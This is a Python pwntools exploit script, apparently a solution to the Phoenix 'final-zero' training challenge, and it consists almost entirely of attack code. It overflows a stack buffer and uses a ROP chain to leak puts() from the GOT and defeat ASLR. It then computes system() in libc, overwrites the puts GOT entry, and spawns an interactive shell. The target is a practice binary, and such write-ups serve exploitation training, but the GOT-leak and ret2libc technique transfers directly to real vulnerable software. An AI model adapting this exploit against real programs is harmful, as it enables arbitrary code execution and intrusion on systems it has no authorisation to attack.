final 0 phoenix aslr bypass local

1. #!/usr/bin/python
2.  
3. from pwn import *
4.  
5. p = process("/opt/phoenix/i486/final-zero")
6.  
7. def main():
8.     # Skips banner
9.     p.recvline()
10.  
11.     # call   0x80483f0 <puts@plt>
12.     puts_plt = 0x80483f0
13.  
14.     # final-zero : 0x8048f9d --> 0x2e006873 ('sh')
15.     sh = 0x8048f9d
16.  
17.     # 1095791425 found at offset: 532
18.     offset = "A" * 532
19.  
20.     # 08049968  00000407 R_386_JUMP_SLOT   00000000   puts
21.     puts_got = 0x08049968
22.  
23.     # 0x080485ac : pop ebp ; ret
24.     pop_ret = 0x080485ac
25.    
26.     # call   0x80483e0 <gets@plt>
27.     gets_plt = 0x80483e0
28.    
29.     # 08049960  00000107 R_386_JUMP_SLOT   00000000   printf
30.     printf_got = 0x08049960
31.  
32.     # To prevent confusion when creating payload   
33.     new_system_plt = puts_plt
34.  
35.     # Stage 1: leak
36.     buf = offset
37.     buf += p32(puts_plt)
38.     buf += p32(pop_ret)
39.     buf += p32(puts_got)
40.    
41.     # Stage 2: ovewrite puts_got
42.     buf += p32(gets_plt)
43.     buf += p32(pop_ret)
44.     buf += p32(puts_got)
45.  
46.     # Execute exploit
47.     buf += p32(new_system_plt)
48.     buf += '\x90' * 4
49.     buf += p32(sh)
50.  
51.     # 1st stage
52.     p.sendline(buf)
53.     leak = p.recv(4) # Only receives the real puts() addr
54.  
55.     # Debug purpose: dumpfile in hex for use with `hexdump`
56.     fname = "dumpfile"
57.     with open(fname, 'w') as f:
58.         f.write(leak)
59.  
60.     log.info("-----Stage 1-----")  
61.     log.info("Leak length: %d" % len(leak))
62.  
63.     puts_addr = u32(leak) # Unpacks address into its hex format
64.     log.success("puts addr: 0x%x" % puts_addr) 
65.     log.success("puts got: 0x%x" % puts_got)
66.  
67.     # objdump -d /opt/phoenix/i486-linux-musl/lib/libc.so |grep "<puts>"
68.     # 0004b8ee <puts>:
69.     puts_offset = 0x0004b8ee
70.  
71.     libc_base = puts_addr - puts_offset
72.     log.success("libc base addr: 0x%x" % libc_base)
73.  
74.     # objdump -d /opt/phoenix/i486-linux-musl/lib/libc.so |grep "<system>"
75.     # 00040824 <system>:
76.     system_offset = 0x00040824
77.     system = libc_base + system_offset
78.     log.success("system addr: 0x%x" % system)
79.  
80.     p.sendline( p32(system) ) # Here, we overwrite puts_got with system()  
81.     log.info("-----Stage 2-----")
82.     log.warn("Overwrite puts_got with system")
83.     log.progress("Executing shell....")
84.     p.recvline() # Skips junk
85.  
86.     p.interactive() # Pass interaction back to user
87.  
88. if __name__ == "__main__":
89. main()